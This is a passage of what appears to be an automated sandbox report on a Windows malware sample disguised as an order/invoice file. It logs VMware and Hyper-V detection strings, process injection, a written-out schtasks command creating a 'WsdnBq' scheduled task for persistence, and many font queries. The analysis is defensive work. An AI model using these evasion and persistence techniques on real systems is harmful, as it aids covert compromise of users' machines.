Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.333366002.0000000008D9A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: WsdnBq.exe, 00000008.00000003.450250389.00000000015E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

Memory written: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process created: C:\Users\user\AppData\Roaming\WsdnBq.exe {path}	Jump to behavior

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
